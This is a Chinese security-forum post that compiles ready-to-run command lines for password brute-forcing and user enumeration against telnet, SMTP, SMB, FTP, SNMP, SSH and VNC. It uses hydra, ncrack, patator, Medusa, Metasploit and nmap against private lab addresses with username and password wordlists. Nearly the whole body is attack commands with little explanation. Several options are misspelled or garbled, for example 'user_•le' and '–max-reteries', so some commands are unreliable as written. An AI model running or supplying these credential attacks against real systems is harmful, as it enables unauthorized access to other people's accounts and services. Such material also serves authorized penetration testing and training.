安全矩阵

 找回密码
 立即注册
搜索
查看: 2195|回复: 0

针对多个系统服务的攻击尝试

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-8 22:00:10 | 显示全部楼层 |阅读模式
原文链接:针对多个系统服务的攻击尝试

本文对常见的系统服务的认证系统进行攻击尝试的方式做了汇总,使用到的工具主要包括 hydra、ncrack、patator、Metasploit 和 Medusa,这些工具默认在 kali 上已经安装,可以直接使用,本文主要涉及的服务包括:telnet、SMTP、SMB、FTP、SNMP、SSH、VNC,关于工具的介绍和服务的介绍未进行讲解,需自行查阅资料进行了解。

telnet


hydra
hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet
-L 指定用户名列表
-P 指定密码列表

Ncrack
ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23
-U 指定用户名列表
-P 指定密码列表

Patator
patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’

Metasploit
  1. use auxiliary/scanner/telnet/telnet_login
  2. msf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host)
  3. msf exploit (telnet_login)>set user_•le /root/Desktop/user txt
  4. msf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txt
  5. msf exploit (telnet_login)>set stop_on_success true
  6. msf exploit (telnet_login)> exploit
复制代码



SMTP


telent
连接 25 端口:
telnet 192.168.1.107 25
枚举用户,结果返回 550 则表示用户不存在,结果返回 250,251,252 表示用户是有效的:
vrfy raj@mail.lab.ignite

Metasploit
  1. use auxiliary/scanner/smtp/smtp_enum
  2. msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
  3. msf auxiliary(smtp_enum) > set rport 25
  4. msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
  5. msf auxiliary(smtp_enum) > exploit
复制代码



smtp-user-enum
smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
-M 指定使用哪种方式枚举,比如 EXPN, VRFY 或 RCPT
-U 指定用户名列表
-t 指定目标主机 IP

指定邮箱后缀,用户名列表只需要名字即可,使用参数 -D:
smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

iSMTP
ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt


SMB

Hydra
hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb

Ncrack
ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445

Medusa
medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt

Metasploit
  1. use auxiliary/scanner/smb/smb_login
  2. msf exploit (smb_login)>set rhost 192.168.1.118
  3. msf exploit (smb_login)>set user_•le /root/Desktop/user.txt
  4. msf exploit (smb_login)>set pass_•le /root/Desktop/pass.txt
  5. msf exploit (smb_login)>set stop_on_success true
  6. msf exploit (smb_login)>exploit
复制代码



FTP

Hydra
hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp

Ncrack
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21

Medusa
Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp

Patator
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit
  1. use auxiliary/scanner/ftp/ftp_login
  2. msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)
  3. msf exploit (ftp_login)>set user_•le /root/Desktop/user.txt
  4. msf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txt
  5. msf exploit (ftp_login)>set stop_on_success true
  6. msf exploit (ftp_login)> exploit
复制代码



SNMP

Hydra
hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp

Medusa
medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt

Metasploit

  1. use auxiliary/scanner/snmp/snmp_login
  2. msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)
  3. msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txt
  4. msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true
  5. msf auxiliary(scanner/snmp/snmp_login)> run
复制代码



Nmap
nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt

Onesixtyone
onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt

SSHHydra
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh

Medusa
medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh

Ncrack
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22

Patator
patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

Metasploit
  1. use auxiliary/scanner/ssh/ssh_login
  2. msf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host)
  3. msf exploit (ssh_login)>set user_•le /root/Desktop/user.txt
  4. msf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txt
  5. msf exploit (ssh_login)>exploit
复制代码



VNC
Hydra
Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

Metasploit
  1. use auxiliary/scanner/vnc/vnc_login
  2. msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
  3. msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txt
  4. msf auxiliary(scanner/vnc/vnc_login) > run
复制代码



Patator
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

Medusa
Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Ncrack
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900


总结
整体来看,这些工具可以对除了以上几种服务攻击之外,还可以对其他更多的服务进行攻击尝试,比如数据库服务中的 mssql、mysql、oracle 等,差异仅仅在于参数不同,这里主要做个备忘,以备不时之需,没啥技术含量,仅供参考。













回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 00:49 , Processed in 0.014131 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表